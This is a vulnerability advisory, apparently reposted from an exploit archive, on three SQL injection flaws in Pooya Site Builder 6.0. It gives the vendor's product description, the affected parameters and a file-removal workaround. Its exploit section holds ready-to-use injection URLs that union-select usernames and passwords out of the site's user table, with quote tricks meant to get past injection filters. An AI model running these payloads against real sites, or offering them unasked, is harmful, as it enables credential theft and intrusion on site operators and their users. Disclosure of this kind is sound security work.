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Pooya Site Builder (PSB) 6.0 Multiple SQL Injection Vulnerabilities

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Pooya Site Builder (PSB) 6.0 Multiple SQL Injection Vulnerabilities 

#        AmnPardaz Security Research Team
# Title: Pooya Site Builder (PSB) SQL Injection Vulnerabilities
# Vendor: www.paridel.com
# Vulnerable Version: 6.0 (Assembly Version)
# Exploit: Available
# Impact: High
# Fix: N/A

1. Description:
    Pooya site builder (psb) is an easy to use database driven web content management and security management system. It allows you to create, edit & web content instantly using just a browser, psb provides all essential feature you need for running your own business websites (you can even use it for large websites, without the complexity of unused functions).

2. Vulnerabilities:
    2.1. Injection Flaws. SQL Injection in "/utils/getXsl.aspx" in "xslIdn" parameter.
        2.1.1. Exploit:
                        Check the exploit section.
    2.2. Injection Flaws. SQL Injection in "/utils/getXml.aspx" in "part" parameter.
        2.2.1. Exploit:
                        Check the exploit section.
    2.3. Injection Flaws. SQL Injection in "/utils/getXls.aspx" in "part" parameter.
        2.3.1. Exploit:
                        Check the exploit section.

3. Exploits:
    Original Exploit URL: http://bugreport.ir/index.php?/42/exploit

    Use Internet Explorer (IE) for best result.
    Note: "'" used to bypass any SQL Injection denier.
    3.1. SQL Injection in "/utils/getXsl.aspx" in "xslIdn" parameter.
            http://[URL]/utils/getXsl.aspx?xslIdn=-1' union' all' select 'UsrNam%2bUsrPwd' from' [Usr]
            Open downloaded file by notepad.
    3.2. SQL Injection in "/utils/getXml.aspx" in "part" parameter.
            http://[URL]/utils/getXml.aspx?lnkIdn=-1&part=1 from' 'lnk' 'where' 1='2187 'union' all' 'select' 'UsrNam%2bUsrPwd' from' [Usr]' 'union' all' select' data1'
            Open downloaded file by notepad.
    3.3. SQL Injection in "/utils/getXls.aspx" in "part" parameter.
            /utils/getXls.aspx?lnkIdn=-1&part=1 'from 'lnk' 'where' 1='2187 'union' all' 'select' 'CHAR(60)%2bCHAR(116)%2bCHAR(97)%2bCHAR(98)%2bCHAR(108)%2bCHAR(101)%2bCHAR(62)%2bCHAR(60)%2bCHAR(116)%2bCHAR(114)%2bCHAR(62)%2b CHAR(60)%2bCHAR(116)%2bCHAR(100)%2bCHAR(62)%2bUsrNam%2bUsrPwd%2bCHAR(60)%2bCHAR(47)%2bCHAR(116)%2bCHAR(100)%2bCHAR(62)%2b CHAR(60)%2bCHAR(47)%2bCHAR(116)%2bCHAR(114)%2bCHAR(62)%2bCHAR(60)%2bCHAR(47)%2bCHAR(116)%2bCHAR(97)%2bCHAR(98)%2bCHAR(108)%2bCHAR(101)%2bCHAR(62) 'from '[Usr] 'union 'all 'select' data1'
            Open downloaded file by notepad.

4. Solution:
    Rename or remove "/utils/getXsl.aspx", "/utils/getXml.aspx", and "/utils/getXls.aspx" files and wait for vendor patch.

#  0day.today [2024-12-27]  #